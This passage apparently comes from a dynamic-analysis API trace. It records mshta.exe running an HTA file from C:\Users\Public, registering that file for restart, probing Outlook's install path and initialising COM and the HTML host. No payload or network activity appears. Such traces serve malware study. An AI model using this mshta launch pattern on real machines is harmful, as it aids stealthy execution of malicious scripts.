returned 0xc00d [0130.003] RegisterClipboardFormatA (lpszFormat="Link Source Descriptor") returned 0xc00f [0130.003] RegisterClipboardFormatA (lpszFormat="Object Descriptor") returned 0xc00e [0130.035] malloc (_Size=0x158) returned 0x8c25a0 [0130.035] malloc (_Size=0x78) returned 0x8ce7c0 [0130.035] rand_s (in: _RandomValue=0x19f840 | out: _RandomValue=0x19f840) returned 0x0 [0130.035] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x203000, flProtect=0x4) returned 0xcf0000 [0130.036] malloc (_Size=0x2600) returned 0xbf22d8 [0130.037] SystemParametersInfoW (in: uiAction=0x4a, uiParam=0x0, pvParam=0x19f9f8, fWinIni=0x0 | out: pvParam=0x19f9f8) returned 1 [0130.037] SystemParametersInfoW (in: uiAction=0x200a, uiParam=0x0, pvParam=0x19f9f4, fWinIni=0x0 | out: pvParam=0x19f9f4) returned 1 [0130.038] GetCurrentProcessId () returned 0xe14 [0130.038] _vsnwprintf (in: _Buffer=0x19fa10, _BufferCount=0x16, _Format="%s%08lX", _ArgList=0x19f9fc | out: _Buffer="#MSHTML#PERF#00000E14") returned 21 [0130.038] OpenFileMappingW (dwDesiredAccess=0x2, bInheritHandle=0, lpName="#MSHTML#PERF#00000E14") returned 0x0 [0130.039] EtwEventRegister () returned 0x0 [0130.039] EtwEventSetInformation () returned 0x0 [0130.039] EtwEventRegister () returned 0x0 [0130.039] EtwEventRegister () returned 0x0 [0130.039] EtwEventRegister () returned 0x0 [0130.040] RegGetValueW (in: hkey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\OUTLOOK.EXE", lpValue="Path", dwFlags=0x2, pdwType=0x0, pvData=0x19f7f0, pcbData=0x19f7e4*=0x208 | out: pdwType=0x0, pvData=0x19f7f0, pcbData=0x19f7e4*=0x6e) returned 0x0 [0130.040] GetFileVersionInfoSizeExW (in: dwFlags=0x1, lpwstrFilename="C:\\Program Files (x86)\\Microsoft Office\\Root\\Office16\\outllib.dll", lpdwHandle=0x19f7e0 | out: lpdwHandle=0x19f7e0) returned 0x0 [0130.041] GetModuleHandleW (lpModuleName=0x0) returned 0xee0000 [0130.041] GetModuleFileNameW (in: hModule=0xee0000, lpFilename=0x19f7f0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0130.041] PathFindFileNameW (pszPath="C:\\Windows\\SysWOW64\\mshta.exe") returned="mshta.exe" [0130.041] RegGetValueW (in: hkey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Application Compatibility", lpValue="mshta.exe", dwFlags=0x18, pdwType=0x0, pvData=0x19f7ec, pcbData=0x19f7e8*=0x4 | out: pdwType=0x0, pvData=0x19f7ec, pcbData=0x19f7e8*=0x4) returned 0x2 [0130.043] malloc (_Size=0x140) returned 0x8ce840 [0130.044] _itow_s (in: _Value=0, _Buffer=0x19f9e4, _BufferCount=0xa, _Radix=10 | out: _Buffer="0") returned 0x0 [0130.045] _itow_s (in: _Value=1, _Buffer=0x19f9e4, _BufferCount=0xa, _Radix=10 | out: _Buffer="1") returned 0x0 [0130.045] _itow_s (in: _Value=2, _Buffer=0x19f9e4, _BufferCount=0xa, _Radix=10 | out: _Buffer="2") returned 0x0 [0130.045] _itow_s (in: _Value=3, _Buffer=0x19f9e4, _BufferCount=0xa, _Radix=10 | out: _Buffer="3") returned 0x0 [0130.045] _itow_s (in: _Value=4, _Buffer=0x19f9e4, _BufferCount=0xa, _Radix=10 | out: _Buffer="4") returned 0x0 [0130.047] GetCurrentProcess () returned 0xffffffff [0130.047] GetProcessTimes (in: hProcess=0xffffffff, lpCreationTime=0x19f998, lpExitTime=0x19f988, lpKernelTime=0x19f988, lpUserTime=0x19f988 | out: lpCreationTime=0x19f998, lpExitTime=0x19f988, lpKernelTime=0x19f988, lpUserTime=0x19f988) returned 1 [0130.050] free (_Block=0x8c22f8) [0130.050] free (_Block=0x8c2408) [0130.050] RegCloseKey (hKey=0x156) returned 0x0 [0130.051] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x74530000 [0130.051] GetProcAddress (hModule=0x74530000, lpProcName="RegisterApplicationRestart") returned 0x74552820 [0130.051] malloc (_Size=0xde) returned 0x8c22f8 [0130.051] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e1d20, cbMultiByte=-1, lpWideCharStr=0x8c22f8, cchWideChar=111 | out: lpWideCharStr="\"C:\\Users\\Public\\powPowNext.hta\" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} ") returned 111 [0130.051] RegisterApplicationRestart (pwzCommandline="\"C:\\Users\\Public\\powPowNext.hta\" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} ", dwFlags=0x0) returned 0x0 [0130.052] free (_Block=0x8c22f8) [0130.052] GetProcAddress (hModule=0x6d6d0000, lpProcName="RunHTMLApplication") returned 0x6e255bb0 [0130.059] NtQuerySystemInformation (in: SystemInformationClass=0xa4, SystemInformation=0x19fe68, Length=0x20, ResultLength=0x0 | out: SystemInformation=0x19fe68, ResultLength=0x0) returned 0x0 [0130.059] GetCommandLineW () returned="\"C:\\Windows\\SysWOW64\\mshta.exe\" \"C:\\Users\\Public\\powPowNext.hta\" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} " [0130.059] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xe2) returned 0x5e66c8 [0130.059] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0130.060] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x76b10000 [0130.067] GetProcAddress (hModule=0x76b10000, lpProcName="OleInitialize") returned 0x76b38230 [0130.067] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19fdfc | out: lpflOldProtect=0x19fdfc*=0x4) returned 1 [0130.068] OleInitialize (pvReserved=0x0) returned 0x0 [0130.174] IsWindow (hWnd=0x0) returned 0 [0130.174] RegisterClassW (lpWndClass=0x19fe30) returned 0xc23d [0130.175] CreateWindowExW (dwExStyle=0x0, lpClassName="HTML Application Host Window Class", lpWindowName="", dwStyle=0x0, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0xee0000, lpParam=0x6e896780) returned 0x4031a [0130.181] NtdllDefWindowProc_W () returned 0x0 [0130.181] NtdllDefWindowProc_W () returned 0x1 [0130.186] NtdllDefWindowProc_W () returned 0x0 [0130.232] NtdllDefWindowProc_W () returned 0x0 [0130.233] CreateWindowExW (dwExStyle=0x40000, lpClassName="HTML Application Host Window Class", lpWindowName="", dwStyle=0x2cf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x4031a, hMenu=0x0, hInstance=0xee0000, lpParam=0x6e896780) returned 0x70258 [0130.234] NtdllDefWindowProc_W () returned 0x0 [0130.234] NtdllDefWindowProc_W () returned 0x1 [0130.235] NtdllDefWindowProc_W () returned 0x0 [0130.236] NtdllDefWindowProc_W () returned 0x0 [0130.237] SetWindowLongW (hWnd=0x70258, nIndex=-16, dwNewLong=-2100363264) returned 114229248 [0130.237] NtdllDefWindowProc_W () returned 0x0 [0130.238] NtdllDefWindowProc_W () returned 0x0 [0130.246] NtdllDefWindowProc_W () returned 0x0 [0130.247] NtdllDefWindowProc_W () returned 0x0 [0130.247] NtdllDefWindowProc_W () returned 0x0 [0130.248] SetWindowPos (hWnd=0x70258, hWndInsertAfter=0xfffffffe, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1 [0130.248] NtdllDefWindowProc_W () returned 0x0 [0130.248] NtdllDefWindowProc_W () returned 0x0 [0130.249] NtdllDefWindowProc_W () returned 0x0 [0130.250] SendMessageW (hWnd=0x70258, Msg=0x127, wParam=0x3, lParam=0x0) returned 0x0 [0130.250] NtdllDefWindowProc_W () returned 0x0 [0130.251] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xe2) returned 0x5e64a0 [0130.251] PathGetArgsW (pszPath="\"C:\\Users\\Public\\powPowNext.hta\" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} ") returned="{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} " [0130.251] wcsncmp (_String1="{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}", _String2="{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}", _MaxCount=0x26) returned 0 [0130.251] wcsstr (_Str="{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} ", _SubStr="{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}") returned="{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} " [0130.251] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0130.251] LoadLibraryExA (lpLibFileName="SHLWAPI.dll", hFile=0x0, dwFlags=0x0) returned 0x76f60000 [0130.252] GetProcAddress (hModule=0x76f60000, lpProcName="PathRemoveArgsW") returned 0x76f77e30 [0130.252] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19fdd8 | out: lpflOldProtect=0x19fdd8*=0x4) returned 1 [0130.252] PathRemoveArgsW (in: pszPath="\"C:\\Users\\Public\\powPowNext.hta\" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}" | out: pszPath="\"C:\\Users\\Public\\powPowNext.hta\"") [0130.252] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x46) returned 0x5e7258 [0130.252] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x5e7258, Size=0x48) returned 0x5e7258 [0130.252] memcpy_s (in: _Destination=0x5e729c, _DestinationSize=0x2, _Source=0x5e657e, _SourceSize=0x2 | out: _Destination=0x5e729c) returned 0x0 [0130.252] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x5e66c8, Size=0x48) returned 0x5e66c8 [0130.252] PathRemoveBlanksW (in: pszPath="\"C:\\Users\\Public\\powPowNext.hta\"" | out: pszPath="\"C:\\Users\\Public\\powPowNext.hta\"") [0130.252] PathUnquoteSpacesW (in: lpsz="\"C:\\Users\\Public\\powPowNext.hta\"" | out: lpsz="C:\\Users\\Public\\powPowNext.hta") returned 1 [0130.253] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5e7258 | out: hHeap=0x5e0000) returned 1 [0130.253] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0130.253] GetProcAddress (hModule=0x703b0000, lpProcName="CreateURLMonikerEx") returned 0x703e85b0 [0130.253] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19fdcc | out: lpflOldProtect=0x19fdcc*=0x4) returned 1 [0130.254] CreateURLMonikerEx (in: pMkCtx=0x0, szURL="C:\\Users\\Public\\powPowNext.hta", ppmk=0x19fe7c*=0x0, dwFlags=0x1 | out: ppmk=0x19fe7c*=0x5f2fa0) returned 0x0 [0130.399] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5e64a0 | out: hHeap=0x5e0000) returned 1 [0130.399] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x5f6270 [0130.400] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0130.400] GetProcAddress (hModule=0x76da0000, lpProcName="CoCreateInstance") returned 0x76e20060 [0130.400] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19fdb0 | out: lpflOldProtect=0x19fdb0*=0x4) returned 1 [0130.401] CoCreateInstance (in: rclsid=0x6d84f988*(Data1=0x3050f5c8, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6d72c640*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6e8967d4 | out: ppv=0x6e8967d4*=0xd10000) returned 0x0 [0130.413] InitOnceExecuteOnce (in: InitOnce=0x6e89927c, InitFn=0x6dd8e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e89927c, Parameter=0x0, Context=0x0) returned 1 [0130.413] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0130.413] GetProcAddress (hModule=0x76b10000, lpProcName="CoIncrementMTAUsage") returned 0x76df5a00 [0130.419] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19ee28 | out: lpflOldProtect=0x19ee28*=0x4) returned 1 [0130.420] CoIncrementMTAUsage (in: pCookie=0x19ee9c | out: pCookie=0x19ee9c) returned 0x0 [0130.420] malloc (_Size=0x174) returned 0x8ceb40 [0130.420] malloc (_Size=0x2600) returned 0xbf48e0 [0130.421] malloc (_Size=0x294) returned 0x8cecc0 [0130.421] malloc (_Size=0xc8) returned 0xbf6ee8 [0130.422] RegisterClassExW (param_1=0x19edd0) returned 0xc0ef [0130.422] CreateWindowExW (dwExStyle=0x8000080, lpClassName=0xc0ef, lpWindowName=0x0, dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x6d6d0000, lpParam=0x0) returned 0x30316 [0130.423] GetWindowLongW (hWnd=0x30316, nIndex=-20) returned 134217856 [0130.423] NtdllDefWindowProc_W () returned 0x1 [0130.423] NtdllDefWindowProc_W () returned 0x0 [0130.423] NtdllDefWindowProc_W () returned 0x0 [0130.424] NtdllDefWindowProc_W () returned 0x0 [0130.424] NtdllDefWindowProc_W () returned 0x0 [0130.424] ShowWindow (hWnd=0x30316, nCmdShow=8) returned 0 [0130.424] NtdllDefWindowProc_W () returned 0x0 [0130.424] NtdllDefWindowProc_W () returned 0x0 [0130.428] NtdllDefWindowProc_W () returned 0x0 [0130.428] SetWindowPos (hWnd=0x30316, hWndInsertAfter=0x1, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0130.428] NtdllDefWindowProc_W () returned 0x0 [0130.429] NtdllDefWindowProc_W () returned 0x0 [0130.433] GetModuleHandleW (lpModuleName="user32") returned 0x76300000 [0130.433] GetProcAddress (hModule=0x76300000, lpProcName="SetCoalescableTimer") returned 0x76338a70 [0130.433] CreateCompatibleDC (hdc=0x0) returned 0x33010a5b [0130.433] GetDeviceCaps (hdc=0x33010a5b, index=88) returned 96 [0130.433] GetCurrentProcess () returned 0xffffffff [0130.434] GetSystemMetrics (nIndex=1) returned 900 [0130.434] GetSystemMetrics (nIndex=0) returned 1440 [0130.434] GetSystemMetrics (nIndex=68) returned 4 [0130.434] GetSystemMetrics (nIndex=69) returned 4 [0130.434] GetSystemMetrics (nIndex=2) returned 17 [0130.434] GetSystemMetrics (nIndex=3) returned 17 [0130.434] SystemParametersInfoW (in: uiAction=0x29, uiParam=0x1f8, pvParam=0x19ec50, fWinIni=0x0 | out: pvParam=0x19ec50) returned 1 [0130.434] CreateFontIndirectW (lplf=0x19ede8) returned 0x220a0a14 [0130.434] SelectObject (hdc=0x33010a5b, h=0x220a0a14) returned 0x18a0048 [0130.434] GetTextMetricsW (in: hdc=0x33010a5b, lptm=0x19ee6c | out: lptm=0x19ee6c) returned 1 [0130.435] SelectObject (hdc=0x33010a5b, h=0x18a0048) returned 0x220a0a14 [0130.435] DeleteObject (ho=0x220a0a14) returned 1 [0130.435] GetSystemDefaultLCID () returned 0x409 [0130.435] GetUserDefaultLCID () returned 0x409 [0130.435] GetACP () returned 0x4e4 [0130.435] GetLocaleInfoW (in: Locale=0x400, LCType=0x20001014, lpLCData=0x19ee30, cchData=2 | out: lpLCData="\x01") returned 2 [0130.435] GetLocaleInfoW (in: Locale=0x400, LCType=0x13, lpLCData=0x19ee34, cchData=11 | out: lpLCData="0123456789") returned 11 [0130.435] SystemParametersInfoW (in: uiAction=0x46, uiParam=0x0, pvParam=0x6e89f8f0, fWinIni=0x0 | out: pvParam=0x6e89f8f0) returned 1 [0130.436] SystemParametersInfoW (in: uiAction=0x42, uiParam=0xc, pvParam=0x19ee44, fWinIni=0x0 | out: pvParam=0x19ee44) returned 1 [0130.436] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0130.436] LoadLibraryExA (lpLibFileName="UxTheme.dll", hFile=0x0, dwFlags=0x0) returned 0x70040000 [0130.436] GetProcAddress (hModule=0x70040000, lpProcName=0x6e77552a) returned 0x70074660 [0130.436] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19ede8 | out: lpflOldProtect=0x19ede8*=0x4) returned 1 [0130.437] IsAppThemed () returned 0x1 [0130.437] SystemParametersInfoW (in: uiAction=0x1042, uiParam=0x0, pvParam=0x6e7822e4, fWinIni=0x0 | out: pvParam=0x6e7822e4) returned 1 [0130.437] SystemParametersInfoW (in: uiAction=0x103e, uiParam=0x0, pvParam=0x6e7822e8, fWinIni=0x0 | out: pvParam=0x6e7822e8) returned 1 [0130.437] malloc (_Size=0xb4) returned 0xbf6fb8 [0130.438] malloc (_Size=0xc0) returned 0xbf7078 [0130.439] malloc (_Size=0xfc) returned 0xbf7140 [0130.439] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xd0) returned 0x5e64a0 [0130.439] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x1f0 [0130.439] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x5f5d80 [0130.440] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x1f4 [0130.440] GetCurrentThreadId () returned 0xb48 [0130.440] malloc (_Size=0xcc) returned 0xbf7248 [0130.440] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x5f6180 [0130.440] GetSystemWindowsDirectoryW (in: lpBuffer=0x19ecd8, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0130.440] CreateActCtxW (pActCtx=0x19ecb8) returned 0x600474 [0130.442] ActivateActCtx (in: hActCtx=0x600474, lpCookie=0x19ec84 | out: hActCtx=0x600474, lpCookie=0x19ec84) returned 1 [0130.442] LoadLibraryExW (lpLibFileName="comctl32.dll", hFile=0x0, dwFlags=0x0) returned 0x6eaf0000 [0130.452] DeactivateActCtx (dwFlags=0x0, ulCookie=0x1de50001) returned 1 [0130.452] malloc (_Size=0x304) returned 0xbf7320 [0130.452] GetCurrentProcess () returned 0xffffffff [0130.452] GetCurrentThread () returned 0xfffffffe [0130.452] GetCurrentProcess () returned 0xffffffff [0130.452] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0xbf7350, dwDesiredAccess=0x4a, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0xbf7350*=0x204) returned 1 [0130.452] GetCurrentThreadId () returned 0xb48 [0130.452] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x200 [0130.452] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x208 [0130.452] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x20c [0130.452] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x210 [0130.453] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x214 [0130.453] _beginthreadex (in: _Security=0x0, _StackSize=0x493e0, _StartAddress=0x6dd9a820, _ArgList=0x8cc140, _InitFlag=0x10000, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x218 [0130.453] WaitForMultipleObjectsEx (nCount=0x2, lpHandles=0x19ee48*=0x210, bWaitAll=0, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0130.563] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x21c [0130.563] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x220 [0130.563] _beginthreadex (in: _Security=0x0, _StackSize=0x493e0, _StartAddress=0x6dd9a820, _ArgList=0x8cc168, _InitFlag=0x10000, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x224 [0130.563] WaitForMultipleObjectsEx (nCount=0x2, lpHandles=0x19ee48*=0x21c, bWaitAll=0, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0130.806] _beginthreadex (in: _Security=0x0, _StackSize=0x493e0, _StartAddress=0x6dd90a20, _ArgList=0x8c2840, _InitFlag=0x10000, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x228 [0130.806] WaitForMultipleObjectsEx (nCount=0x2, lpHandles=0x19ee6c*=0x200, bWaitAll=0, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0130.825] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollDelay", nDefault=50) returned 0x32 [0130.825] GetProfileIntA (lpAppName="windows", lpKeyName="DragDelay", nDefault=200) returned 0xc8 [0130.825] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollInterval", nDefault=50) returned 0x32 [0130.825] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19ed0c, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0130.825] PathFindFileNameW (pszPath="C:\\Windows\\SysWOW64\\mshta.exe") returned="mshta.exe" [0130.825] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x14) returned 0x5fcc88 [0130.825] IsInternetESCEnabled () returned 0x0 [0130.826] RegGetValueW (in: hkey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", lpValue="NoFileMenu", dwFlags=0xffff, pdwType=0x19ecf8, pvData=0x19ecfc, pcbData=0x19ed04*=0x4 | out: pdwType=0x19ecf8*=0x0, pvData=0x19ecfc, pcbData=0x19ed04*=0x4) returned 0x2 [0130.826] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.826] malloc (_Size=0x15c) returned 0xbf7630 [0130.826] QueryPerformanceFrequency (in: lpFrequency=0x19eec0 | out: lpFrequency=0x19eec0*=100000000) returned 1 [0130.827] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.827] malloc (_Size=0x194) returned 0xbf7eb0 [0130.827] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.827] malloc (_Size=0xec) returned 0xbf8050 [0130.828] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.828] malloc (_Size=0x170) returned 0xbf8148 [0130.828] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788 [0130.828] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788 [0130.828] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.828] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.828] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.828] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.828] GetCurrentThreadId () returned 0xb48 [0130.828] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.829] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.829] malloc (_Size=0x114) returned 0xbf82c0 [0130.829] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.831] malloc (_Size=0xd4) returned 0xbf83e0 [0130.831] RegisterClipboardFormatW (lpszFormat="WM_HTML_GETOBJECT") returned 0xc0f0 [0130.831] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.831] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.831] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0130.832] GetProcAddress (hModule=0x703b0000, lpProcName="CoInternetCreateSecurityManager") returned 0x7040efe0 [0130.832] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19ee64 | out: lpflOldProtect=0x19ee64*=0x4) returned 1 [0130.832] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x6e893db0, dwReserved=0x0 | out: ppSM=0x6e893db0*=0x5f0200) returned 0x0 [0130.834] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.834] malloc (_Size=0xe0) returned 0xbf84c0 [0130.834] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.834] GetCurrentProcess () returned 0xffffffff [0130.834] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19eeb0 | out: TokenHandle=0x19eeb0*=0x244) returned 1 [0130.834] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0130.835] LoadLibraryExA (lpLibFileName="srpapi.dll", hFile=0x0, dwFlags=0x0) returned 0x6cda0000 [0130.867] GetProcAddress (hModule=0x6cda0000, lpProcName="SrpGetEnterpriseIds") returned 0x6cda80f0 [0130.867] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19ee2c | out: lpflOldProtect=0x19ee2c*=0x4) returned 1 [0130.867] SrpGetEnterpriseIds () returned 0x0 [0130.867] CloseHandle (hObject=0x244) returned 1 [0130.868] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.868] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.868] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x60) returned 0x600f00 [0130.868] GetDoubleClickTime () returned 0x1f4 [0130.868] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.868] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollInset", nDefault=11) returned 0xb [0130.869] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.870] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.870] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.870] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.870] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.871] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.871] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.871] malloc (_Size=0x164) returned 0xbf8630 [0130.871] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.871] malloc (_Size=0xb8) returned 0xbf87a0 [0130.872] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.873] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.873] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.873] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.873] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.873] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.873] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.873] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.874] memcpy_s (in: _Destination=0xd08180, _DestinationSize=0xb8, _Source=0x19e568, _SourceSize=0xb8 | out: _Destination=0xd08180) returned 0x0 [0130.874] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.874] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.874] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.874] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.874] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.874] malloc (_Size=0x16c) returned 0xbf8860 